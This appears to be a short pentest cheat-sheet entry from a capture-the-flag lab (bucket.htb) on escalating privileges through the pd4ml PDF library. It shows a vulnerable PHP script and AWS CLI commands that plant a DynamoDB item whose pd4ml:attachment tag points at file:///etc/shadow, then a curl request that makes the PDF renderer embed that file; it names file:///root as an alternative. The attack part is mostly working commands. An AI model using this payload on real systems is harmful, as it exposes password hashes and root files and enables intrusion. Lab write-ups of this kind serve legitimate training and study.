PD4ML Attachment from DynamoDB

privesc, foothold, web, aws

Overview #

Attacker can gain access to sensitive files by embedding it inside PDF doc using pd4ml library via malicuous DynamoDB data.

Environment Setup #

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

Steps #

{
	"TableName": "alerts",
	"KeySchema": [{
			"AttributeName": "title",
			"KeyType": "HASH"
		},
		{
			"AttributeName": "data",
			"KeyType": "RANGE"
		}
	],
	"AttributeDefinitions": [{
			"AttributeName": "title",
			"AttributeType": "S"
		},
		{
			"AttributeName": "data",
			"AttributeType": "S"
		}
	],
	"ProvisionedThroughput": {
		"ReadCapacityUnits": 5,
		"WriteCapacityUnits": 5
	}
}
aws --endpoint-url http://s3.bucket.htb dynamodb create-table --cli-input-json file://./alerts.json
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///etc/shadow</pd4ml:attachment>"}}
curl -X POST 'http://localhost:8000' -d 'action=get_alerts'

Alternatives #

file:///root

Refeferences #